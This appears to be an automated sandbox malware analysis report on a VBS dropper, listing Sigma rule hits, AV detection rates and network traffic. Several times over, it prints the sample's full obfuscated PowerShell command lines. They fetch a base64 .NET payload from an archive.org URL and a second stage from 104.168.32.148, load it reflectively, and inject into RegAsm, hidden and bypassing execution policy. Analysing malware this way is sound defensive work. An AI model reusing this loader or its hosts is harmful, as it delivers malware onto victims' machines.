              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKydGYicrJ2FzZScrJzY0Q29udCcrJ2UnKyduJysndCk7ZycrJ1lGYScrJ3MnKydzJysnZW1ibCcrJ3kgPSBbUmVmbCcrJ2VjJysndGknKydvbi5BJysnc3MnKydlbWJseScrJ10nKyc6OicrJ0xvYWQoZ1lGYmknKyduYXJ5JysnQ29uJysndGVudCcrJyk7Z1lGdHlwZSA9IGdZRmEnKydzc2VtJysnYmx5LkcnKydldFR5cGUnKycoQ05BUnVuUEUnKycuSCcrJ29tJysnZUNOJysnQSk7Z1lGJysnbWUnKyd0aCcrJ29kID0gZ1lGdCcrJ3lwZS5HZXRNZXRob2QoQ05BVicrJ0FJQ05BKTtnWUZtZXRob2QuSW52b2tlKGdZRicrJ251bGwsIFtvYmplYycrJ3RbJysnXV1AKENOQXR4dC4nKydBWlBQSEMvNTQnKyczLzg0MS4nKycyMy44NjEnKycuJysnNDAxLy86cHR0aENOQSAsIENOQWRlc2F0aXZhZG9DTkEgLCBDTkFkZXNhdGl2YScrJ2RvQ04nKydBICwnKycgQ04nKydBJysnZGVzYXRpdicrJ2EnKydkb0NOQSxDJysnTkFSZScrJ2dBc21DTkEnKycsQycrJ05BQ05BJysnKSknKS5yRVBsYUNFKCdDTkEnLFtzdHJJbmddW0NIYXJdMzkpLnJFUGxhQ0UoJ2dZRicsJyQnKSB8IC4gKCAkZU5WOkNPbXNwRWNbNCwyNiwyNV0tak9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKydGYicrJ2FzZScrJzY0Q29udCcrJ2UnKyduJysndCk7ZycrJ1lGYScrJ3MnKydzJysnZW1ibCcrJ3kgPSBbUmVmbCcrJ2VjJysndGknKydvbi5BJysnc3MnKydlbWJseScrJ10nKyc6OicrJ0xvYWQoZ1lGYmknKyduYXJ5JysnQ29uJysndGVudCcrJyk7Z1lGdHlwZSA9IGdZRmEnKydzc2VtJysnYmx5LkcnKydldFR5cGUnKycoQ05BUnVuUEUnKycuSCcrJ29tJysnZUNOJysnQSk7Z1lGJysnbWUnKyd0aCcrJ29kID0gZ1lGdCcrJ3lwZS5HZXRNZXRob2QoQ05BVicrJ0FJQ05BKTtnWUZtZXRob2QuSW52b2tlKGdZRicrJ251bGwsIFtvYmplYycrJ3RbJysnXV1AKENOQXR4dC4nKydBWlBQSEMvNTQnKyczLzg0MS4nKycyMy44NjEnKycuJysnNDAxLy86cHR0aENOQSAsIENOQWRlc2F0aXZhZG9DTkEgLCBDTkFkZXNhdGl2YScrJ2RvQ04nKydBICwnKycgQ04nKydBJysnZGVzYXRpdicrJ2EnKydkb0NOQSxDJysnTkFSZScrJ2dBc21DTkEnKycsQycrJ05BQ05BJysnKSknKS5yRVBsYUNFKCdDTkEnLFtzdHJJbmddW0NIYXJdMzkpLnJFUGxhQ0UoJ2dZRicsJyQnKSB8IC4gKCAkZU5WOkNPbXNwRWNbNCwyNiwyNV0tak9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\kz1fEn2R9Z.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\kz1fEn2R9Z.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\kz1fEn2R9Z.vbs", ProcessId: 7548, ProcessName: wscript.exe
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKydGYicrJ2FzZScrJzY0Q29udCcrJ2UnKyduJysndCk7ZycrJ1lGYScrJ3MnKydzJysnZW1ibCcrJ3kgPSBbUmVmbCcrJ2VjJysndGknKydvbi5BJysnc3MnKydlbWJseScrJ10nKyc6OicrJ0xvYWQoZ1lGYmknKyduYXJ5JysnQ29uJysndGVudCcrJyk7Z1lGdHlwZSA9IGdZRmEnKydzc2VtJysnYmx5LkcnKydldFR5cGUnKycoQ05BUnVuUEUnKycuSCcrJ29tJysnZUNOJysnQSk7Z1lGJysnbWUnKyd0aCcrJ29kID0gZ1lGdCcrJ3lwZS5HZXRNZXRob2QoQ05BVicrJ0FJQ05BKTtnWUZtZXRob2QuSW52b2tlKGdZRicrJ251bGwsIFtvYmplYycrJ3RbJysnXV1AKENOQXR4dC4nKydBWlBQSEMvNTQnKyczLzg0MS4nKycyMy44NjEnKycuJysnNDAxLy86cHR0aENOQSAsIENOQWRlc2F0aXZhZG9DTkEgLCBDTkFkZXNhdGl2YScrJ2RvQ04nKydBICwnKycgQ04nKydBJysnZGVzYXRpdicrJ2EnKydkb0NOQSxDJysnTkFSZScrJ2dBc21DTkEnKycsQycrJ05BQ05BJysnKSknKS5yRVBsYUNFKCdDTkEnLFtzdHJJbmddW0NIYXJdMzkpLnJFUGxhQ0UoJ2dZRicsJyQnKSB8IC4gKCAkZU5WOkNPbXNwRWNbNCwyNiwyNV0tak9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKydGYicrJ2FzZScrJzY0Q29udCcrJ2UnKyduJysndCk7ZycrJ1lGYScrJ3MnKydzJysnZW1ibCcrJ3kgPSBbUmVmbCcrJ2VjJysndGknKydvbi5BJysnc3MnKydlbWJseScrJ10nKyc6OicrJ0xvYWQoZ1lGYmknKyduYXJ5JysnQ29uJysndGVudCcrJyk7Z1lGdHlwZSA9IGdZRmEnKydzc2VtJysnYmx5LkcnKydldFR5cGUnKycoQ05BUnVuUEUnKycuSCcrJ29tJysnZUNOJysnQSk7Z1lGJysnbWUnKyd0aCcrJ29kID0gZ1lGdCcrJ3lwZS5HZXRNZXRob2QoQ05BVicrJ0FJQ05BKTtnWUZtZXRob2QuSW52b2tlKGdZRicrJ251bGwsIFtvYmplYycrJ3RbJysnXV1AKENOQXR4dC4nKydBWlBQSEMvNTQnKyczLzg0MS4nKycyMy44NjEnKycuJysnNDAxLy86cHR0aENOQSAsIENOQWRlc2F0aXZhZG9DTkEgLCBDTkFkZXNhdGl2YScrJ2RvQ04nKydBICwnKycgQ04nKydBJysnZGVzYXRpdicrJ2EnKydkb0NOQSxDJysnTkFSZScrJ2dBc21DTkEnKycsQycrJ05BQ05BJysnKSknKS5yRVBsYUNFKCdDTkEnLFtzdHJJbmddW0NIYXJdMzkpLnJFUGxhQ0UoJ2dZRicsJyQnKSB8IC4gKCAkZU5WOkNPbXNwRWNbNCwyNiwyNV0tak9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\kz1fEn2R9Z.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\kz1fEn2R9Z.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\kz1fEn2R9Z.vbs", ProcessId: 7548, ProcessName: wscript.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKydGYicrJ2FzZScrJzY0Q29udCcrJ2UnKyduJysndCk7ZycrJ1lGYScrJ3MnKydzJysnZW1ibCcrJ3kgPSBbUmVmbCcrJ2VjJysndGknKydvbi5BJysnc3MnKydlbWJseScrJ10nKyc6OicrJ0xvYWQoZ1lGYmknKyduYXJ5JysnQ29uJysndGVudCcrJyk7Z1lGdHlwZSA9IGdZRmEnKydzc2VtJysnYmx5LkcnKydldFR5cGUnKycoQ05BUnVuUEUnKycuSCcrJ29tJysnZUNOJysnQSk7Z1lGJysnbWUnKyd0aCcrJ29kID0gZ1lGdCcrJ3lwZS5HZXRNZXRob2QoQ05BVicrJ0FJQ05BKTtnWUZtZXRob2QuSW52b2tlKGdZRicrJ251bGwsIFtvYmplYycrJ3RbJysnXV1AKENOQXR4dC4nKydBWlBQSEMvNTQnKyczLzg0MS4nKycyMy44NjEnKycuJysnNDAxLy86cHR0aENOQSAsIENOQWRlc2F0aXZhZG9DTkEgLCBDTkFkZXNhdGl2YScrJ2RvQ04nKydBICwnKycgQ04nKydBJysnZGVzYXRpdicrJ2EnKydkb0NOQSxDJysnTkFSZScrJ2dBc21DTkEnKycsQycrJ05BQ05BJysnKSknKS5yRVBsYUNFKCdDTkEnLFtzdHJJbmddW0NIYXJdMzkpLnJFUGxhQ0UoJ2dZRicsJyQnKSB8IC4gKCAkZU5WOkNPbXNwRWNbNCwyNiwyNV0tak9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKydGYicrJ2FzZScrJzY0Q29udCcrJ2UnKyduJysndCk7ZycrJ1lGYScrJ3MnKydzJysnZW1ibCcrJ3kgPSBbUmVmbCcrJ2VjJysndGknKydvbi5BJysnc3MnKydlbWJseScrJ10nKyc6OicrJ0xvYWQoZ1lGYmknKyduYXJ5JysnQ29uJysndGVudCcrJyk7Z1lGdHlwZSA9IGdZRmEnKydzc2VtJysnYmx5LkcnKydldFR5cGUnKycoQ05BUnVuUEUnKycuSCcrJ29tJysnZUNOJysnQSk7Z1lGJysnbWUnKyd0aCcrJ29kID0gZ1lGdCcrJ3lwZS5HZXRNZXRob2QoQ05BVicrJ0FJQ05BKTtnWUZtZXRob2QuSW52b2tlKGdZRicrJ251bGwsIFtvYmplYycrJ3RbJysnXV1AKENOQXR4dC4nKydBWlBQSEMvNTQnKyczLzg0MS4nKycyMy44NjEnKycuJysnNDAxLy86cHR0aENOQSAsIENOQWRlc2F0aXZhZG9DTkEgLCBDTkFkZXNhdGl2YScrJ2RvQ04nKydBICwnKycgQ04nKydBJysnZGVzYXRpdicrJ2EnKydkb0NOQSxDJysnTkFSZScrJ2dBc21DTkEnKycsQycrJ05BQ05BJysnKSknKS5yRVBsYUNFKCdDTkEnLFtzdHJJbmddW0NIYXJdMzkpLnJFUGxhQ0UoJ2dZRicsJyQnKSB8IC4gKCAkZU5WOkNPbXNwRWNbNCwyNiwyNV0tak9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle
              Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
              Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKyd

              Suricata Signatures

              No Suricata rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for submitted file
              Source: kz1fEn2R9Z.vbsReversingLabs: Detection: 26%
              Source: kz1fEn2R9Z.vbsVirustotal: Detection: 12%Perma Link
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.2% probability
              Source: unknownHTTPS traffic detected: 207.241.227.240:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1754168405.000001A61E429000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000003.00000002.1787469124.000001A636B6B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: dbpdbtem.pdb source: powershell.exe, 00000003.00000002.1754168405.000001A61E429000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: e.pdb+ source: powershell.exe, 00000003.00000002.1787469124.000001A636B6B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.pdbp source: powershell.exe, 00000003.00000002.1787469124.000001A636B6B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Data.Linq.pdb source: powershell.exe, 00000003.00000002.1788155155.000001A636EF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.1770505012.000001A62F7FE000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000003.00000002.1787469124.000001A636B6B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Management.Automation.pdb# source: powershell.exe, 00000003.00000002.1787469124.000001A636B6B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: 50e96378b6e77999stem.pdb source: powershell.exe, 00000003.00000002.1787469124.000001A636B6B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1787469124.000001A636B3F000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Suspicious execution chain found
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: global trafficHTTP traffic detected: GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1Host: ia600100.us.archive.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /345/CHPPZA.txt HTTP/1.1Host: 104.168.32.148Connection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 104.168.32.148 104.168.32.148
              Source: Joe Sandbox ViewIP Address: 207.241.227.240 207.241.227.240
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
              Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.148
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1Host: ia600100.us.archive.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /345/CHPPZA.txt HTTP/1.1Host: 104.168.32.148Connection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: ia600100.us.archive.org
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 02 Oct 2024 03:30:44 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25Content-Length: 300Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 31 2e 32 35 20 53 65 72 76 65 72 20 61 74 20 31 30 34 2e 31 36 38 2e 33 32 2e 31 34 38 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25 Server at 104.168.32.148 Port 80</address></body></html>
              Source: powershell.exe, 00000003.00000002.1754476864.000001A61EC0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.168.32.148
              Source: powershell.exe, 00000003.00000002.1754476864.000001A61EC0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.168.32.148/345/CHPPZA.txt
              Source: powershell.exe, 00000003.00000002.1754476864.000001A61FEBA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ia600100.us.archive.org
              Source: powershell.exe, 00000003.00000002.1770505012.000001A62E855000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1754476864.000001A620270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000003.00000002.1754476864.000001A61EA04000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1754476864.000001A61FF02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000001.00000002.1801623265.000001B680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1754476864.000001A61E7E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000003.00000002.1754476864.000001A61FF02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: powershell.exe, 00000003.00000002.1754476864.000001A61EA04000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1754476864.000001A61FF02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000001.00000002.1801623265.000001B680053000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
              Source: powershell.exe, 00000001.00000002.1801623265.000001B68006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1754476864.000001A61E7E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000003.00000002.1754476864.000001A620270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000003.00000002.1754476864.000001A620270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
